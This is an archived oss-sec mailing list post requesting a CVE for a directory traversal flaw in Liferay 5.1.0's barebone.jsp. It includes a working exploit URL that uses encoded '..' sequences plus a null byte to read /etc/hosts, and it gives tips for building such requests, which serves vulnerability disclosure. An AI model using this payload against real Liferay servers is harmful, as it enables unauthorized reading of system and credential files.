oss-sec mailing list archives

CVE:Request - Path Traversal Barebone.jsp - Liferay 5.1.0


From: "petrella.pietro" <petrella.pietro () gmail com>
Date: Mon, 1 Aug 2016 18:38:09 +0200


I discovered a directory traversal issue on the minifierBundleDir barebone.jsp variable on a website with Liferay 5.1.0. I don't exclude that this vulnerability is present in other Liferay versions as well.

However, I report the following vulnerable URL as an example:

https://mysite.it/html/js/barebone.jsp?browserId=firefox&themeId=sometheme&colorSchemeId=01&minifierType=js&minifierBundleId=javascript.barebone.files&minifierBundleDir=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E%2Fetc%2Fhosts%00.html&t=1429132297000

It's important to note that the URL requested is built in the following manner:

- only ".." encoded characters are permitted when you insert the traversal request
- at the end of the file it is necessary to insert %00 and .html, otherwise the request is not accepted

So, to navigate the filesystem it is recommended to use the Burp Suite "repeater tab" tool.

If there is no CVE about this finding, for this purpose I require a CVE please.

Thank you
Pietro

-- -- -- -- --
Pietro Petrella
Information Security Consultant
(CISSP, OPST, RHCE, ISO 27001:2013)
PGP: 5017 E6A8 9E1E 5B39 8C52 05C7 81A5 C3C9 8ED5 4730

